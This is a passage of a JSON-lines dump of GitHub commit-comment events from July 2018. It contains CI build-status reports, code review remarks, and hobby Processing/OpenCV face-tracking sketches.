href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-cd8f41aeab471832824c9c7ac9f1d4acabebd8ae-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-cd8f41aeab471832824c9c7ac9f1d4acabebd8ae-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.05%25-green.png)</a>\n"}},"created_at":"2018-07-27T07:54:06Z"}
{"id":"8027116644","type":"CommitCommentEvent","actor":{"login":"nzrnshah"},"repo":{"name":"nzrnshah/mytestproject"},"payload":{"comment":{"id":29855174,"position":null,"line":null,"path":null,"commit_id":"def86828bd1c904bcdac27801be3a06d7950851c","created_at":"2018-07-27T07:54:41Z","updated_at":"2018-07-27T07:54:41Z","author_association":"OWNER","body":"I accept this changes from branch to master folder"}},"created_at":"2018-07-27T07:54:41Z"}
{"id":"8027116905","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"jasondegraw/EnergyPlus"},"payload":{"comment":{"id":29855175,"position":null,"line":null,"path":null,"commit_id":"b863eb6e939cb9e11beb1e4136244250725d29a3","created_at":"2018-07-27T07:54:46Z","updated_at":"2018-07-27T07:54:46Z","author_association":"NONE","body":"fix-eio-wind-angles (jasondegraw) - i386-Windows-7-VisualStudio-14: OK (2948 of 2948 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b863eb6e939cb9e11beb1e4136244250725d29a3-PR6858-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-b863eb6e939cb9e11beb1e4136244250725d29a3-PR6858-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-27T07:54:46Z"}
{"id":"8027120636","type":"CommitCommentEvent","actor":{"login":"Ankine"},"repo":{"name":"SergiyKozachok/DentistProjectRepos"},"payload":{"comment":{"id":29855182,"position":11,"line":11,"path":"src/app/footer/footer.component.html","commit_id":"cbf5939271d41ff06b6e968df7f01bd34f33fda3","created_at":"2018-07-27T07:55:38Z","updated_at":"2018-07-27T07:55:38Z","author_association":"NONE","body":"you can use *ngFor directive to generate all links"}},"created_at":"2018-07-27T07:55:38Z"}
{"id":"8027124485","type":"CommitCommentEvent","actor":{"login":"christianBermeo"},"repo":{"name":"camigomez35/Signal_Identification"},"payload":{"comment":{"id":29855194,"position":null,"line":null,"path":null,"commit_id":"c6d2a833e06acc4f9ef73720bb227604e011ee4b","created_at":"2018-07-27T07:56:35Z","updated_at":"2018-07-27T07:56:35Z","author_association":"NONE","body":"disculpe, tengo dos motores de igual potencia, pero al momento de correr el programa, estos no giran, tendre que corregir algo en el código arduino? "}},"created_at":"2018-07-27T07:56:35Z"}
{"id":"8027126116","type":"CommitCommentEvent","actor":{"login":"huythuy2495"},"repo":{"name":"huythuy2495/project_rails"},"payload":{"comment":{"id":29855197,"position":null,"line":null,"path":null,"commit_id":"8bd504b87546adc6419e58ef0f9f2bcab50ff31f","created_at":"2018-07-27T07:56:59Z","updated_at":"2018-07-27T07:56:59Z","author_association":"OWNER","body":"chapter 8"}},"created_at":"2018-07-27T07:56:59Z"}
{"id":"8027130396","type":"CommitCommentEvent","actor":{"login":"Ankine"},"repo":{"name":"SergiyKozachok/DentistProjectRepos"},"payload":{"comment":{"id":29855211,"position":4,"line":4,"path":"src/app/log-up-form/log-up-form.component.html","commit_id":"cbf5939271d41ff06b6e968df7f01bd34f33fda3","created_at":"2018-07-27T07:58:04Z","updated_at":"2018-07-27T07:58:04Z","author_association":"NONE","body":"You dont need to use (submit)=\"logUpUser($event)\" if you are goning to submit form value from ts file. You can use bindigns to some model instead of getting all values from 'form object'"}},"created_at":"2018-07-27T07:58:04Z"}
{"id":"8027132223","type":"CommitCommentEvent","actor":{"login":"licong20060541"},"repo":{"name":"licong20060541/awesome_point_impl"},"payload":{"comment":{"id":29855218,"position":null,"line":null,"path":null,"commit_id":"5e6a96ec84780d620f273e8f08c020abc9d336f5","created_at":"2018-07-27T07:58:28Z","updated_at":"2018-07-27T07:58:28Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-27T07:58:28Z"}
{"id":"8027134400","type":"CommitCommentEvent","actor":{"login":"arthurhongkong"},"repo":{"name":"arthurhongkong/student-list"},"payload":{"comment":{"id":29855226,"position":5,"line":53,"path":"README.md","commit_id":"dcedfadf92a2c955618fdba4bcd01c447e0ed93f","created_at":"2018-07-27T07:58:59Z","updated_at":"2018-07-27T07:58:59Z","author_association":"OWNER","body":"arthur"}},"created_at":"2018-07-27T07:58:59Z"}
{"id":"8027134828","type":"CommitCommentEvent","actor":{"login":"mispy"},"repo":{"name":"owid/owid-grapher"},"payload":{"comment":{"id":29855227,"position":null,"line":null,"path":null,"commit_id":"7953af2e389a21584942148e64f19d7f6d7e20a8","created_at":"2018-07-27T07:59:05Z","updated_at":"2018-07-27T07:59:05Z","author_association":"MEMBER","body":"It's sort of a compromise that maintains the semantic equivalence of what data is displayed between mobile/desktop. Your idea for showing only the needed bars was good from a visual design perspective :)"}},"created_at":"2018-07-27T07:59:05Z"}
{"id":"8027135928","type":"CommitCommentEvent","actor":{"login":"Ankine"},"repo":{"name":"SergiyKozachok/DentistProjectRepos"},"payload":{"comment":{"id":29855234,"position":7,"line":12,"path":"src/app/app.module.ts","commit_id":"37c272c7970c2c5c07a2fce5cb31206095a17db5","created_at":"2018-07-27T07:59:21Z","updated_at":"2018-07-27T07:59:21Z","author_association":"NONE","body":"You can move routing to separate module"}},"created_at":"2018-07-27T07:59:21Z"}
{"id":"8027136911","type":"CommitCommentEvent","actor":{"login":"GAUTAMRAJU15"},"repo":{"name":"InfluenceIO/frontend"},"payload":{"comment":{"id":29855237,"position":null,"line":null,"path":null,"commit_id":"7bb6eb38ea38363c3982844ac704f4d518c3a570","created_at":"2018-07-27T07:59:36Z","updated_at":"2018-07-27T07:59:36Z","author_association":"COLLABORATOR","body":"sir in local when removed console showing duck is not used"}},"created_at":"2018-07-27T07:59:36Z"}
{"id":"8027137998","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29855241,"position":null,"line":null,"path":null,"commit_id":"c0f7d95bb83394f4ab04e445dd96a6f8ffc209d9","created_at":"2018-07-27T07:59:52Z","updated_at":"2018-07-27T07:59:52Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/hamburger-menu-not-working-when-signed-in/93274/2\n"}},"created_at":"2018-07-27T07:59:52Z"}
{"id":"8027146473","type":"CommitCommentEvent","actor":{"login":"Cardanont"},"repo":{"name":"Cardanont/CollaborationTest001"},"payload":{"comment":{"id":29855265,"position":null,"line":null,"path":null,"commit_id":"a62dcbacc8c5d118970dab8632894798bbf16f57","created_at":"2018-07-27T08:01:45Z","updated_at":"2018-07-27T08:01:45Z","author_association":"OWNER","body":"Excellent looks like this is working"}},"created_at":"2018-07-27T08:01:45Z"}
{"id":"8027146741","type":"CommitCommentEvent","actor":{"login":"Ankine"},"repo":{"name":"SergiyKozachok/DentistProjectRepos"},"payload":{"comment":{"id":29855267,"position":17,"line":17,"path":"src/app/index-of-site/index-of-site.component.ts","commit_id":"37c272c7970c2c5c07a2fce5cb31206095a17db5","created_at":"2018-07-27T08:01:50Z","updated_at":"2018-07-27T08:01:50Z","author_association":"NONE","body":"It's better to use routerLink directive instead of manual navigation from code if you are not going to some additional work in code"}},"created_at":"2018-07-27T08:01:50Z"}
{"id":"8027149117","type":"CommitCommentEvent","actor":{"login":"jacobgil"},"repo":{"name":"jacobgil/pytorch-tensor-decompositions"},"payload":{"comment":{"id":29855272,"position":null,"line":null,"path":null,"commit_id":"16177775fe17267be41f43a8d96368c826970e99","created_at":"2018-07-27T08:02:24Z","updated_at":"2018-07-27T08:02:24Z","author_association":"OWNER","body":"@nzmora License now added to the main pytorch-tensor-decomposition repository."}},"created_at":"2018-07-27T08:02:24Z"}
{"id":"8027149514","type":"CommitCommentEvent","actor":{"login":"Vampire"},"repo":{"name":"Discord4J/Discord4J"},"payload":{"comment":{"id":29855273,"position":9,"line":175,"path":"build.gradle","commit_id":"94fe39be24f7c53a34bfdc13529fe3e4473c2382","created_at":"2018-07-27T08:02:30Z","updated_at":"2018-07-27T08:02:30Z","author_association":"NONE","body":"Sure, I just say, there is no need to explicitly configure the URL which could maybe change in the future, but you get the same effect if you set `distributionType = ALL` (which is actually only helpful when developing the build, for just running the build, `ALL` is not really necessary).\r\n\r\nAnd with configuring the gradle version in the build script, you always have to first edit the build script before calling the task to update the version while you could simply give the new version on the command line and if no version is given in both places the current version is used anyway.\r\n\r\nActually you could also simply change the version in the URL in `gradle-wrapper.properties` to upgrade and then call the `wrapper` task without any configuration in the build script.\r\nThis would even be better in case the actual wrapper JAR or start scripts change.\r\nBy editing the version in the wrapper configuration an calling the task, the wrapper files are regenerated from the old Gradle version, by first changing the URL in the `gradle-wrapper.properties` the wrapper task is already executed with the new version and so you get the new wrapper files if there are some. :-)"}},"created_at":"2018-07-27T08:02:30Z"}
{"id":"8027149594","type":"CommitCommentEvent","actor":{"login":"e1016"},"repo":{"name":"e1016/mafuba"},"payload":{"comment":{"id":29855274,"position":null,"line":null,"path":null,"commit_id":"a4639900460668fc5dbad350426380a56098be40","created_at":"2018-07-27T08:02:31Z","updated_at":"2018-07-27T08:02:31Z","author_association":"OWNER","body":"Just started playing with this library and enjoying it in React Native, I noticed that it did not have any kind of exception control, it is always useful to show a custom error message."}},"created_at":"2018-07-27T08:02:31Z"}
{"id":"8027153010","type":"CommitCommentEvent","actor":{"login":"Ankine"},"repo":{"name":"SergiyKozachok/DentistProjectRepos"},"payload":{"comment":{"id":29855283,"position":6,"line":21,"path":"src/app/log-up-form/log-up-form.component.ts","commit_id":"37c272c7970c2c5c07a2fce5cb31206095a17db5","created_at":"2018-07-27T08:03:20Z","updated_at":"2018-07-27T08:03:20Z","author_association":"NONE","body":"we don't need to work with form event here"}},"created_at":"2018-07-27T08:03:20Z"}
{"id":"8027157000","type":"CommitCommentEvent","actor":{"login":"huilvhui"},"repo":{"name":"huilvhui/myFirstProject"},"payload":{"comment":{"id":29855293,"position":null,"line":null,"path":null,"commit_id":"7df5221c4597dc1eaa0f0337ef5a67f7fe95251c","created_at":"2018-07-27T08:04:19Z","updated_at":"2018-07-27T08:04:19Z","author_association":"OWNER","body":"commit2"}},"created_at":"2018-07-27T08:04:19Z"}
{"id":"8027158436","type":"CommitCommentEvent","actor":{"login":"penfold42"},"repo":{"name":"jgarff/rpi_ws281x"},"payload":{"comment":{"id":29855296,"position":null,"line":null,"path":null,"commit_id":"caa135d2216400c8f7d4aaff956ba5347a4463ef","created_at":"2018-07-27T08:04:39Z","updated_at":"2018-07-27T08:04:39Z","author_association":"CONTRIBUTOR","body":"I suggest opening an issue.\r\nHow did you install ?\r\nDid you upgrade ?\r\nDid you remove and reinstall "}},"created_at":"2018-07-27T08:04:39Z"}
{"id":"8027165215","type":"CommitCommentEvent","actor":{"login":"binarin"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29855309,"position":26,"line":26,"path":"pkgs/development/tools/misc/texinfo/common.nix","commit_id":"d531a1e96784cc64d17cef1892d1f747c7c02b10","created_at":"2018-07-27T08:06:18Z","updated_at":"2018-07-27T08:06:18Z","author_association":"CONTRIBUTOR","body":"Hi @oxij  `procps` was conditional on `doCheck` before, not on `interactive`. Is it intentional or just a typo?"}},"created_at":"2018-07-27T08:06:18Z"}
{"id":"8027167314","type":"CommitCommentEvent","actor":{"login":"pilhuhn"},"repo":{"name":"eclipse/microprofile-service-mesh"},"payload":{"comment":{"id":29855319,"position":43,"line":43,"path":"samples/istio/services.yaml","commit_id":"bf0bde7c7cf7810998834456668260eac7d091a1","created_at":"2018-07-27T08:06:48Z","updated_at":"2018-07-27T08:06:48Z","author_association":"NONE","body":"We should not hardcode the namespace, as people may want to deploy somewhere else.\r\nEspecially on OpenShift, default is a namespace that users should not use (as far as I understand) to run their own code."}},"created_at":"2018-07-27T08:06:48Z"}
{"id":"8027169455","type":"CommitCommentEvent","actor":{"login":"Ankine"},"repo":{"name":"SergiyKozachok/DentistProjectRepos"},"payload":{"comment":{"id":29855321,"position":21,"line":42,"path":"src/app/log-up-form/log-up-form.component.ts","commit_id":"c77d2f650f0e90d3c5bd4018b2ca49270ae99fe3","created_at":"2018-07-27T08:07:20Z","updated_at":"2018-07-27T08:07:20Z","author_association":"NONE","body":"You have to create something like mapping between roles and appropriate home pages. It should be separate service or something like this because this functionality can be used somewhere else"}},"created_at":"2018-07-27T08:07:20Z"}
{"id":"8027170337","type":"CommitCommentEvent","actor":{"login":"Devilla"},"repo":{"name":"InfluenceIO/frontend"},"payload":{"comment":{"id":29855324,"position":null,"line":null,"path":null,"commit_id":"7bb6eb38ea38363c3982844ac704f4d518c3a570","created_at":"2018-07-27T08:07:33Z","updated_at":"2018-07-27T08:07:33Z","author_association":"COLLABORATOR","body":"i removed duck."}},"created_at":"2018-07-27T08:07:33Z"}
{"id":"8027173389","type":"CommitCommentEvent","actor":{"login":"visionarywind"},"repo":{"name":"dyc87112/SpringBoot-Learning"},"payload":{"comment":{"id":29855328,"position":35,"line":7,"path":"Chapter3-1-2/src/main/java/com/didispace/web/HelloController.java","commit_id":"70570d5d1f89161d20fad5c1932ff74726a340c0","created_at":"2018-07-27T08:08:18Z","updated_at":"2018-07-27T08:08:18Z","author_association":"NONE","body":"import org.springframework.web.bind.annotation.ResponseBody;"}},"created_at":"2018-07-27T08:08:18Z"}
{"id":"8027173485","type":"CommitCommentEvent","actor":{"login":"JJ"},"repo":{"name":"perl6/doc"},"payload":{"comment":{"id":29855329,"position":65,"line":308,"path":"doc/Language/exceptions.pod6","commit_id":"e85d8d1948c13f069a48cf7a897595fc343070d5","created_at":"2018-07-27T08:08:19Z","updated_at":"2018-07-27T08:08:19Z","author_association":"CONTRIBUTOR","body":"You are right. I though it was, but I can't seem to find it...\n"}},"created_at":"2018-07-27T08:08:19Z"}
{"id":"8027175643","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29855337,"position":null,"line":null,"path":null,"commit_id":"3cfabd54dd030f0050b7f2ebb9010a80dc403d94","created_at":"2018-07-27T08:08:50Z","updated_at":"2018-07-27T08:08:50Z","author_association":"COLLABORATOR","body":"This commit will help you @alejandroarturom \r\n\r\nIt's all cool now.\r\n![screen shot 2018-07-27 at 2 07 37 am](https://user-images.githubusercontent.com/163977/43309423-fe51834c-9141-11e8-9548-d37bce2fda68.png)\r\n"}},"created_at":"2018-07-27T08:08:50Z"}
{"id":"8027179085","type":"CommitCommentEvent","actor":{"login":"awe777"},"repo":{"name":"awe777/my-service"},"payload":{"comment":{"id":29855347,"position":null,"line":null,"path":null,"commit_id":"b678fb830f8bcf9d178cfe68ec3de311a50e5e80","created_at":"2018-07-27T08:09:44Z","updated_at":"2018-07-27T08:09:44Z","author_association":"OWNER","body":"this commit makes the code handily resolve situations when:\r\n\r\n- attempting to create a storage that has the same name as an existing storage within the database (resolution: do nothing and post a console saying that such storage exists)\r\n\r\n- attempting to add data to a non-existent storage (resolution: do nothing and post a console prompting the user to create such storage)\r\n\r\n- attempting to read data from a non-existent storage (resolution: same as above)"}},"created_at":"2018-07-27T08:09:44Z"}
{"id":"8027180141","type":"CommitCommentEvent","actor":{"login":"JJ"},"repo":{"name":"perl6/doc"},"payload":{"comment":{"id":29855350,"position":65,"line":308,"path":"doc/Language/exceptions.pod6","commit_id":"e85d8d1948c13f069a48cf7a897595fc343070d5","created_at":"2018-07-27T08:09:58Z","updated_at":"2018-07-27T08:09:58Z","author_association":"CONTRIBUTOR","body":"Oh, right, I found it: the mention to the Wikipedia Manual of Style advises\nthat:\nhttps://github.com/perl6/doc/blob/0d57bfa1d37e6948ab941f661c2474475dd4bf8f/writing-docs/STYLEGUIDE.md\n"}},"created_at":"2018-07-27T08:09:58Z"}
{"id":"8027180285","type":"CommitCommentEvent","actor":{"login":"ajblane"},"repo":{"name":"ajblane/dcurl"},"payload":{"comment":{"id":29855352,"position":22,"line":134,"path":"src/pow_fpga_accel.c","commit_id":"27a31fd45bb964e2511712e8eee628d36282e4a7","created_at":"2018-07-27T08:10:01Z","updated_at":"2018-07-27T08:10:01Z","author_association":"OWNER","body":"I refer to \"Example: Sending and Receiving Characters\" in the \"Embedded\nPeripherals IP User Guide Introduction\"  document to implement it without\nany considerations. However, as for as i know, the write function can be\nsuited for writing small data (about 2KB) and have a good performance. In\nthis case, 2673 trytes (>2KB) are written into buffer, so I prefer to use\nthe fwrite function.\n\n2018-07-26 21:50 GMT+08:00 Jim Huang <notifications@github.com>:\n\n> What are your considerations to use buffered I/O functions such as fwrite\n> instead of low-level I/O ones (such as write)?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ajblane/dcurl/commit/27a31fd45bb964e2511712e8eee628d36282e4a7#commitcomment-29844188>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AFF2eid_I_sjPZlhMH4C3yetXDq3c8q_ks5uKckMgaJpZM4Vh2zs>\n> .\n>\n"}},"created_at":"2018-07-27T08:10:01Z"}
{"id":"8027180539","type":"CommitCommentEvent","actor":{"login":"ianfab"},"repo":{"name":"ianfab/Makruk-Stockfish"},"payload":{"comment":{"id":29855355,"position":null,"line":null,"path":null,"commit_id":"72e094284146c2db8f14c511e2794099c3158305","created_at":"2018-07-27T08:10:05Z","updated_at":"2018-07-27T08:10:05Z","author_association":"OWNER","body":"@thaichessswinboard There do not seem to be any images in your comment. Could you please provide FENs?"}},"created_at":"2018-07-27T08:10:05Z"}
{"id":"8027180697","type":"CommitCommentEvent","actor":{"login":"Ankine"},"repo":{"name":"SergiyKozachok/DentistProjectRepos"},"payload":{"comment":{"id":29855357,"position":6,"line":6,"path":"src/app/user.service.ts","commit_id":"a2a8e702c7c04ef80025d21897a8e1ef4a7f4e7c","created_at":"2018-07-27T08:10:08Z","updated_at":"2018-07-27T08:10:08Z","author_association":"NONE","body":"Probably this service should know how to get user from Db or register new one"}},"created_at":"2018-07-27T08:10:08Z"}
{"id":"8027182709","type":"CommitCommentEvent","actor":{"login":"flixx"},"repo":{"name":"3YOURMIND/django-add-default-value"},"payload":{"comment":{"id":29855363,"position":5,"line":3,"path":"README.md","commit_id":"ae5f88f5bee4c67acf2b64f0ad9fd20358e951cd","created_at":"2018-07-27T08:10:35Z","updated_at":"2018-07-27T08:10:35Z","author_association":"CONTRIBUTOR","body":"@dodekeract Because, I thought that Pypi did not support markdown. https://pypi.org/project/django-add-default-value/ was totally destroyed. Meanwhile, I learned that a `long_description_content_type=\"text/markdown\",` whould have been sufficient (https://dustingram.com/articles/2018/03/16/markdown-descriptions-on-pypi)"}},"created_at":"2018-07-27T08:10:35Z"}
{"id":"8027185669","type":"CommitCommentEvent","actor":{"login":"JJ"},"repo":{"name":"perl6/doc"},"payload":{"comment":{"id":29855378,"position":65,"line":308,"path":"doc/Language/exceptions.pod6","commit_id":"e85d8d1948c13f069a48cf7a897595fc343070d5","created_at":"2018-07-27T08:11:17Z","updated_at":"2018-07-27T08:11:17Z","author_association":"CONTRIBUTOR","body":"In particular, this is the section referring to \"sentence case\"\nhttps://en.wikipedia.org/wiki/Wikipedia:Manual_of_Style#Article_titles\n"}},"created_at":"2018-07-27T08:11:17Z"}
{"id":"8027189080","type":"CommitCommentEvent","actor":{"login":"petebacondarwin"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":29855383,"position":6,"line":283,"path":"packages/compiler-cli/src/ngtsc/metadata/src/resolver.ts","commit_id":"ce7a14087e62650969b1f0a63cbeb62703ff8d1c","created_at":"2018-07-27T08:12:06Z","updated_at":"2018-07-27T08:12:06Z","author_association":"MEMBER","body":"Doh! Rebase error!"}},"created_at":"2018-07-27T08:12:06Z"}
{"id":"8027189149","type":"CommitCommentEvent","actor":{"login":"miguel-l"},"repo":{"name":"miguel-l/Stockfish"},"payload":{"comment":{"id":29855384,"position":null,"line":null,"path":null,"commit_id":"8190a94b71a38f00ed43f928fd329c54508b5d6f","created_at":"2018-07-27T08:12:07Z","updated_at":"2018-07-27T08:12:07Z","author_association":"OWNER","body":"I'm not sure if these are really simplifications, it would be nice if someone can confirm.\r\n\r\nAlso, at this point, I think this bonus should really be called something else. Hopefully something passes and we can clean it up before doing a PR."}},"created_at":"2018-07-27T08:12:07Z"}
{"id":"8027189617","type":"CommitCommentEvent","actor":{"login":"sundarsne"},"repo":{"name":"sundarsne/Data-Science-Portfolio"},"payload":{"comment":{"id":29855385,"position":null,"line":null,"path":null,"commit_id":"17100cbe76093ef741fd6a70b7657a03a15bf6ea","created_at":"2018-07-27T08:12:14Z","updated_at":"2018-07-27T08:12:14Z","author_association":"OWNER","body":"de"}},"created_at":"2018-07-27T08:12:14Z"}
{"id":"8027191839","type":"CommitCommentEvent","actor":{"login":"thisismike97"},"repo":{"name":"jgarff/rpi_ws281x"},"payload":{"comment":{"id":29855387,"position":null,"line":null,"path":null,"commit_id":"caa135d2216400c8f7d4aaff956ba5347a4463ef","created_at":"2018-07-27T08:12:45Z","updated_at":"2018-07-27T08:12:45Z","author_association":"NONE","body":"I originally set all this up last year on a regular 3B, now on the 3B+ i did a git pull and rebuild it using just scons.\r\n\r\nI'll try a reinstall."}},"created_at":"2018-07-27T08:12:45Z"}
{"id":"8027194079","type":"CommitCommentEvent","actor":{"login":"flixx"},"repo":{"name":"3YOURMIND/django-add-default-value"},"payload":{"comment":{"id":29855393,"position":5,"line":3,"path":"README.md","commit_id":"ae5f88f5bee4c67acf2b64f0ad9fd20358e951cd","created_at":"2018-07-27T08:13:18Z","updated_at":"2018-07-27T08:13:18Z","author_association":"CONTRIBUTOR","body":"@dodekeract See https://github.com/mozilla/unicode-slugify/issues/16 or https://github.com/pyoceans/pocean-core/issues/19. I guess I could have also changed setup.py like described there."}},"created_at":"2018-07-27T08:13:18Z"}
{"id":"8027196888","type":"CommitCommentEvent","actor":{"login":"kstrzala"},"repo":{"name":"neptune-ml/open-solution-home-credit"},"payload":{"comment":{"id":29855397,"position":20,"line":426,"path":"src/pipeline_blocks.py","commit_id":"3db5c0b3ebb9df95524407a3143bdf6804c6918d","created_at":"2018-07-27T08:13:59Z","updated_at":"2018-07-27T08:13:59Z","author_association":"NONE","body":"Well, it's better but I would say that it's weird to construct OneHotEncoder using OneHotEncoder ;) Actually if a class is 'OneHotEncoder' why to allow it to have different encoder?\r\n\r\nI know that in such reviews I shouldn't suggest solutions, but apart from one obvious solution: changing the functionality (and constructor) of OneHotEncoder, there is IMO at least the second one: changing the name of CategoryEncoder/OneHotEncoder such that it'll reflect that it's category encoder that changes also names. Maybe there are other solutions and I don't indicate which one is better."}},"created_at":"2018-07-27T08:13:59Z"}
{"id":"8027197715","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"Jekaa/Stockfish"},"payload":{"comment":{"id":29855398,"position":null,"line":null,"path":null,"commit_id":"0433255b367b8a81b1742a50901fdd4cf65e7263","created_at":"2018-07-27T08:14:10Z","updated_at":"2018-07-27T08:14:10Z","author_association":"NONE","body":"You can try an alternative implementation.\r\n\r\nYou can do it like for the king safety calculation in pawns.cpp. This depends in addition from the own king position which is also is saved in the pawn eval table entry. If we now retrieve the king safety (function king_safety, line 52, pawns.h) from the pawn eval entry first is checked if the current king position matches with the saved. If yes take the there saved king safety score else recalculate it and store and return it.\r\n\r\nYou have save the ep square and recalculate complete pawn eval if this not matches."}},"created_at":"2018-07-27T08:14:10Z"}
{"id":"8027198604","type":"CommitCommentEvent","actor":{"login":"JJ"},"repo":{"name":"perl6/doc"},"payload":{"comment":{"id":29855400,"position":65,"line":308,"path":"doc/Language/exceptions.pod6","commit_id":"e85d8d1948c13f069a48cf7a897595fc343070d5","created_at":"2018-07-27T08:14:23Z","updated_at":"2018-07-27T08:14:23Z","author_association":"CONTRIBUTOR","body":"Created now an issue: https://github.com/perl6/doc/issues/2223\n\nThanks for the comment.\n"}},"created_at":"2018-07-27T08:14:23Z"}
{"id":"8027200678","type":"CommitCommentEvent","actor":{"login":"kuominglu"},"repo":{"name":"kuominglu/pi"},"payload":{"comment":{"id":29855407,"position":null,"line":null,"path":null,"commit_id":"2c9d923e63c5d89003bb32dbdbee7fcb23ac070f","created_at":"2018-07-27T08:14:53Z","updated_at":"2018-07-27T08:14:53Z","author_association":"OWNER","body":"import gab.opencv.*;\r\nimport processing.video.*;\r\nimport java.awt.*;\r\n\r\nCapture video;\r\nOpenCV opencv;\r\n\r\nvoid setup() {\r\n  size(640, 480);\r\n  video = new Capture(this, 640/2, 480/2);\r\n  opencv = new OpenCV(this, 640/2, 480/2);\r\n  opencv.loadCascade(OpenCV.CASCADE_FRONTALFACE);  \r\n\r\n  video.start();\r\n}\r\n\r\nvoid draw() {\r\n  scale(2);\r\n  opencv.loadImage(video);\r\n\r\n  image(video, 0, 0 );\r\n\r\n  noFill();\r\n  stroke(0, 255, 0);\r\n  strokeWeight(3);\r\n  Rectangle[] faces = opencv.detect();   //偵測是否有臉\r\n  println(faces.length);                        \t//偵測到幾張臉\r\n\r\n  for (int i = 0; i < faces.length; i++) {\t//根據臉孔數目來跑迴圈\r\n\tprintln(faces[i].x + \",\" + faces[i].y);\t//顯示臉的座標\r\n\trect(faces[i].x, faces[i].y, faces[i].width, faces[i].height);  //把臉框出來\r\n  }\r\n}\r\n\r\nvoid captureEvent(Capture c) {\r\n  c.read();\r\n}\r\n"}},"created_at":"2018-07-27T08:14:53Z"}
{"id":"8027203869","type":"CommitCommentEvent","actor":{"login":"smdfzeal"},"repo":{"name":"smdfzeal/self-study"},"payload":{"comment":{"id":29855414,"position":null,"line":null,"path":null,"commit_id":"20050c79baab0d677ee430580002719196d687ac","created_at":"2018-07-27T08:15:38Z","updated_at":"2018-07-27T08:15:38Z","author_association":"OWNER","body":"Wah~"}},"created_at":"2018-07-27T08:15:38Z"}
{"id":"8027204365","type":"CommitCommentEvent","actor":{"login":"kuominglu"},"repo":{"name":"kuominglu/pi"},"payload":{"comment":{"id":29855416,"position":null,"line":null,"path":null,"commit_id":"2c9d923e63c5d89003bb32dbdbee7fcb23ac070f","created_at":"2018-07-27T08:15:46Z","updated_at":"2018-07-27T08:15:46Z","author_association":"OWNER","body":"import gab.opencv.*;\r\nimport processing.video.*;\r\nimport java.awt.*;\r\nimport processing.serial.*;\r\nimport cc.arduino.*;\r\n\r\nint center_x, center_y;\r\nArduino arduino;\r\n\r\nCapture video;\r\nOpenCV opencv;\r\n\r\nvoid setup() {\r\n  size(640, 480);  \r\n  video = new Capture(this, 640/2, 480/2);\r\n  opencv = new OpenCV(this, 640/2, 480/2);\r\n  opencv.loadCascade(OpenCV.CASCADE_FRONTALFACE);  \r\n  println(Arduino.list());\r\n\r\n  arduino = new Arduino(this, Arduino.list()[3], 57600);\r\n  arduino.pinMode(9, Arduino.SERVO);\r\n  video.start();\r\n}\r\n\r\nvoid draw() {\r\n  scale(2);\r\n  opencv.loadImage(video);\r\n\r\n  image(video, 0, 0 );\r\n\r\n  noFill();\r\n  stroke(0, 255, 0);\r\n  strokeWeight(2);\r\n  Rectangle[] faces = opencv.detect();\r\n  println(faces.length);  \r\n\r\n  for (int i = 0; i < faces.length; i++) {\r\n    //println(faces[i].x + \",\" + faces[i].y);\r\n    rect(faces[i].x, faces[i].y, faces[i].width, faces[i].height);\r\n    center_x = faces[i].x + (faces[i].width/2);   //起始點x + 0.5*寬\r\n    center_y = faces[i].y + (faces[i].height /2);  //起始點y + 0.5*高\r\n    print(center_x); \r\n    print(\", \"); \r\n    println(center_y);\r\n"}},"created_at":"2018-07-27T08:15:46Z"}
{"id":"8027204660","type":"CommitCommentEvent","actor":{"login":"milansar"},"repo":{"name":"milansar/rwa-trivia"},"payload":{"comment":{"id":29855418,"position":4,"line":99,"path":"src/app/components/app/app.component.ts","commit_id":"ab033c398125cd774f862775086402dadec6a541","created_at":"2018-07-27T08:15:50Z","updated_at":"2018-07-27T08:15:50Z","author_association":"OWNER","body":"use windowRef, do not use directly global window object"}},"created_at":"2018-07-27T08:15:50Z"}
{"id":"8027206886","type":"CommitCommentEvent","actor":{"login":"kuominglu"},"repo":{"name":"kuominglu/pi"},"payload":{"comment":{"id":29855427,"position":null,"line":null,"path":null,"commit_id":"2c9d923e63c5d89003bb32dbdbee7fcb23ac070f","created_at":"2018-07-27T08:16:20Z","updated_at":"2018-07-27T08:16:20Z","author_association":"OWNER","body":"import gab.opencv.*;\r\nimport processing.video.*;\r\nimport java.awt.*;\r\nimport processing.serial.*;\r\nimport cc.arduino.*;\r\n\r\nint center_x, center_y;\r\nArduino arduino;\r\n\r\nCapture video;\r\nOpenCV opencv;\r\n\r\nvoid setup() {\r\n  size(640, 480);  \r\n  video = new Capture(this, 640/2, 480/2);\r\n  opencv = new OpenCV(this, 640/2, 480/2);\r\n  opencv.loadCascade(OpenCV.CASCADE_FRONTALFACE);  \r\n  println(Arduino.list());\r\n\r\n  arduino = new Arduino(this, Arduino.list()[3], 57600);\r\n  arduino.pinMode(9, Arduino.SERVO);\r\n  video.start();\r\n}\r\n\r\nvoid draw() {\r\n  scale(2);\r\n  